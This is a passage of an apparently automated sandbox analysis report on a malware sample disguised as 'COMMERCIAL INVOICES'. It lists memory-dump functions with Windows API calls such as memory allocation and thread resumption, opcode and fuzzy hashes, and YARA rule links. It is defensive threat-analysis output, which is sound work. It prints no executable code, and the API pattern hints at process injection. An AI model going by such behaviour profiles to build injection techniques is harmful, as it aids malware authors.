                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                      • Opcode ID: 4efc3148a8fb2300a7ced544d5655100b79eacae50dbe026914d5bdd95c53066
                                                                                                                                                                                                                                      • Instruction ID: b8e82814bd56d0019f85f8750c5feaaea7f5a4d05800dab2e32b108ad866ed85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4efc3148a8fb2300a7ced544d5655100b79eacae50dbe026914d5bdd95c53066
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 311149B58002499FCB10DFAAC844AEFBFF5EF88320F208819E519A7250C779A540CFA0
                                                                                                                                                                                                                                      Function 07134498 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                                                                                      • Opcode ID: 0d39390dcfbd451657defc88ec7ded8732dcacd1c3cabcbda3dbc06a9216892c
                                                                                                                                                                                                                                      • Instruction ID: 788fc1fdab0163e3018978609e5e8fe53656a052a0b3b5ceb63237b02f683ee0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d39390dcfbd451657defc88ec7ded8732dcacd1c3cabcbda3dbc06a9216892c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65113AB1D002498FDB20DFAAC4457AEFBF5EF88320F208819D519A7250CB79A544CBA4
                                                                                                                                                                                                                                      Function 02BAAF95 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02BAAFFE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                                      • Opcode ID: ad95a947b684dbcdd98b50c07c08b4cb3e11d578c67baf1675604efc9c2a8f58
                                                                                                                                                                                                                                      • Instruction ID: 53d09574e8756e8ebc40685d7e338838514e24aed01629ba8405c42ee591474f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad95a947b684dbcdd98b50c07c08b4cb3e11d578c67baf1675604efc9c2a8f58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E31110B6C002498FCB20CFAAD444AEEFBF5EF88314F20845AD429A7210C379A545CFA0
                                                                                                                                                                                                                                      Function 02BAAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02BAAFFE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                                      • Opcode ID: 359d8ae10c4fd620f43762544fc113abf4ce41b3bbf123a534a9add736bcce96
                                                                                                                                                                                                                                      • Instruction ID: 13090c62ac50b9f6b9e3f2925e439a239da1936d5ac30c0442bc80ef018d7ede
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 359d8ae10c4fd620f43762544fc113abf4ce41b3bbf123a534a9add736bcce96
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 871110B6C002498FCB20DF9AC444ADEFBF4EF88314F10845AD429A7210C379A545CFA1
                                                                                                                                                                                                                                      Function 07136F98 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07136FFD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                                      • Opcode ID: 9e4f8d9d6a7f4db9b8d823af02f930e48d19df8ea1f61cb9ee976e49b3d6d509
                                                                                                                                                                                                                                      • Instruction ID: f84a0c3b960a4b116259bfe58d3ada80d172af7893ab4e2b3ae3ed4d9fa1bb31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e4f8d9d6a7f4db9b8d823af02f930e48d19df8ea1f61cb9ee976e49b3d6d509
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A41106B58003499FDB20DF9AD585BDEBFF8EB49320F20845AE518A7250C379A544CFA1
                                                                                                                                                                                                                                      Function 071347EC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07136FFD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                                      • Opcode ID: 66be0e8e98fd48dbe48179f9da398ff3b5ce9ffa7304aa5580a648ea098eebbb
                                                                                                                                                                                                                                      • Instruction ID: 720c07353b2988b11a16bf43c88da6fc22efb806b0dab292eceb21b931ddc65e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66be0e8e98fd48dbe48179f9da398ff3b5ce9ffa7304aa5580a648ea098eebbb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1511F5B58003499FDB20DF9AD884BDEBBF8EB49310F208419E518A7240C375A944CFA1
                                                                                                                                                                                                                                      Function 00F5D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2377545719.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f5d000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 30e9b1cec5c2a688242c1b3b7df8ad3eac8bb34b30fa2b19e6109dc9d456a6c4
                                                                                                                                                                                                                                      • Instruction ID: 335a53e1e33af1edad611be4476c398464a7cf8c03586cf8754bbd920624d177
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30e9b1cec5c2a688242c1b3b7df8ad3eac8bb34b30fa2b19e6109dc9d456a6c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08213A72501204DFDB25DF14D9C0F26BF65FB98325F20C569DE090B256C33AE85AE7A2
                                                                                                                                                                                                                                      Function 0107D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2377646267.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_107d000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: cf3299bbfc34e1298bc89c72634ae602b3d61b0130a777600e4d097a358473f6
                                                                                                                                                                                                                                      • Instruction ID: f47e9ca24750877ac0bc84bbbb4142bc2116cbd39f1073141cfa6a47df818eb8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3299bbfc34e1298bc89c72634ae602b3d61b0130a777600e4d097a358473f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C021F571A04204EFDB05DF98D5C0B26BBA5FF94324F24C5ADD9894B256C33AD407CB65
                                                                                                                                                                                                                                      Function 0107D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2377646267.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_107d000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 20447a5d8f39c6028ddc56c260ad931906abc6597a9e6149c1e299a08cdd08b0
                                                                                                                                                                                                                                      • Instruction ID: ad13960cc0d70a776f055616734af62c6b8569ad9da0c1ad56f7504374f5bb2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20447a5d8f39c6028ddc56c260ad931906abc6597a9e6149c1e299a08cdd08b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44212571A04200DFCB16DF68D980B16BFA5FF84314F20C5ADE9890B256C33AD407CBA1
                                                                                                                                                                                                                                      Function 0107D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2377646267.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_107d000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4405460ae52a293c97faf1d4fc2adb2248620e9783e3a8543f375a8687f46e17
                                                                                                                                                                                                                                      • Instruction ID: 9098359b5d9d2b8aaa30f2e2ac662886be6ee29c8dbc5f4a1f9c2297eec3ffc5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4405460ae52a293c97faf1d4fc2adb2248620e9783e3a8543f375a8687f46e17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 272165755093808FD713CF64D594715BFB1EF46214F28C5DAD8898F667C33A980ACBA2
                                                                                                                                                                                                                                      Function 00F5D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2377545719.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f5d000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                      • Instruction ID: 53694f5396d18d590eaeb5a3d4b611d01ea33a5b0e23e5e8a869f04b32dbc9bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3110372804240CFDB16CF00D5C4B16BF72FB94324F24C6A9DD490B656C33AE85ADBA2
                                                                                                                                                                                                                                      Function 0107D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2377646267.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_107d000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                                                                                      • Instruction ID: e13e34b5ec51edd3c26ada1358e668545c2c1f6abd6984447acc7fcb7604cc5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6611BB75904280DFDB02CF54C5C4B15BFA1FF84224F28C6A9D9894B296C33AD40BCB62

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 07131F48 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 797b230253a8f725fa42f59068a92dd7b0da7ab40d932a8a6777c4c1a3938d19
                                                                                                                                                                                                                                      • Instruction ID: eac4cd9069afd744a5be421c12756cd5524abd501109d532a83b3a63bf5a14c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 797b230253a8f725fa42f59068a92dd7b0da7ab40d932a8a6777c4c1a3938d19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBE1E7B5E001198FCB14DFA9C9809AEFBB2BF89305F24D169D818AB356D731AD41CF61
                                                                                                                                                                                                                                      Function 071327B8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d6c7dcc58b3020e3abc0f4fe8932edac18fe4e9c2ff0afbced7bedd97bccf82f
                                                                                                                                                                                                                                      • Instruction ID: 0fac47ff57c3c47c6928e809295ad2d01052817070aac0b9678eb1806eb35d5f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6c7dcc58b3020e3abc0f4fe8932edac18fe4e9c2ff0afbced7bedd97bccf82f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CE1EAB5E001198FCB14DFA9C580AAEFBB2BF89305F24D169D418AB35AD731AD41CF61
                                                                                                                                                                                                                                      Function 07133C20 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3cdc7bc6dcf395297ab1a01a02991684b74457e07b7a1db3b38165eaf20f8ab3
                                                                                                                                                                                                                                      • Instruction ID: c62e077e096185c47d9ee0d84e066cce651544550ef2cd555f3f980fabcdd87f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cdc7bc6dcf395297ab1a01a02991684b74457e07b7a1db3b38165eaf20f8ab3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97E1F7B5E001198FCB14DFA9C580AAEFBB2BF89305F24D169D818AB356D731AD41CF61
                                                                                                                                                                                                                                      Function 07131B10 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fd6840009b90c663686b342992f75263c981fdeb1f276cf858db82431a204e2b
                                                                                                                                                                                                                                      • Instruction ID: b99100f0be5121b71a729f29aafa8a4727ef25fa3e450a787993448b4d46395f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd6840009b90c663686b342992f75263c981fdeb1f276cf858db82431a204e2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BE107B4E006199FCB14DFA9C5809AEFBB2BF89305F24D169D818AB356D731AD41CF60
                                                                                                                                                                                                                                      Function 07132380 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bbf87ab55c63f2d03fd3daffa48e038eb45905f1e509d6d5526489bb46936b2e
                                                                                                                                                                                                                                      • Instruction ID: b1a62014637a53142d7e21d0bb2f9995b2a5ec9357cf50ea111d708c2e76d6a2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbf87ab55c63f2d03fd3daffa48e038eb45905f1e509d6d5526489bb46936b2e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5E109B4E001198FDB14DFA9C590AAEFBB2BF89305F24D169D814AB356D731AE41CF60
                                                                                                                                                                                                                                      Function 02BAD5BC Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 63abfc1b632c62d25086c440a6ba30d3dbc51a49551336ce9038c2af44b61a1a
                                                                                                                                                                                                                                      • Instruction ID: b48250ca250dd9fd5556f3ee959fc5a88d486497314313bfe2cc45ee0b1e4971
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63abfc1b632c62d25086c440a6ba30d3dbc51a49551336ce9038c2af44b61a1a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07A16D32E042058FCF15DFB5C8945EEB7B2FF85304B1585AAE805AB265DB32E955CF80
                                                                                                                                                                                                                                      Function 07131AC8 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2503711c64dbac121fdcc751a5ec93eb0246d8d23984d3a19348d56ec18d17b3
                                                                                                                                                                                                                                      • Instruction ID: f60d425cec0dba6a6a7cf9ce1a4064309bae7bda2c3ff077ced581f034272b60
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2503711c64dbac121fdcc751a5ec93eb0246d8d23984d3a19348d56ec18d17b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC514DB0D046599FCB15CFA9C9805AEFBB2BF89305F24C1A9D408AB256D7319E41CF61
                                                                                                                                                                                                                                      Function 071327A7 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9db34f9bc6ca8910f18fc22adba778789755c3edd544fa71b94c24dc7e2bccbd
                                                                                                                                                                                                                                      • Instruction ID: b66257d42e1c86d1fc7002930778332142d63e2325d977486f80c5382e923a76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9db34f9bc6ca8910f18fc22adba778789755c3edd544fa71b94c24dc7e2bccbd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251FAB1E002198FDB15DFA9C9805AEFBF2BF89305F24C169D418A7256D7319E42CFA1
                                                                                                                                                                                                                                      Function 07132371 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3c872eb214dd674b60dd096b6de824f8c15c8b84426d1d780c658e6108a38bda
                                                                                                                                                                                                                                      • Instruction ID: 50a02bb9edffa3d7b9498d56abd3f8f9f955052f763e58d9549805428f7a42c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c872eb214dd674b60dd096b6de824f8c15c8b84426d1d780c658e6108a38bda
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF5118B4E002198BDB15DFA9C9805AEFBB2BF89305F24C169D408AB356D7319E41CFA1
                                                                                                                                                                                                                                      Function 07131F38 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f227b6819fdf9e7169937aec462225f90a71de7ab620d5eb75727e3e01372351
                                                                                                                                                                                                                                      • Instruction ID: 4985a816c470281a2395b46293f6a12e5e7c6fc86bcfa003ee9f21a27b91f62c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f227b6819fdf9e7169937aec462225f90a71de7ab620d5eb75727e3e01372351
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5510DB1E006198BCB14DFA9C5805AEFBF2FF89305F24C169D418AB256D7319E41CFA1
                                                                                                                                                                                                                                      Function 07130D70 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7b6e4a1373262fbf11e8b24a20eefc41a223d53e6b69ee01854c98e1a0a1dd6e
                                                                                                                                                                                                                                      • Instruction ID: 91a7678a6aaed5a91b279b30bbf19273b7f2327c71c2e23ffd76dcfdb5fd2360
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b6e4a1373262fbf11e8b24a20eefc41a223d53e6b69ee01854c98e1a0a1dd6e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 323139B5E18249CBDB08CFAAD4816EDFBF2EB8E310F14C16AD408A7291D7349585CB50
                                                                                                                                                                                                                                      Function 07135EA0 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
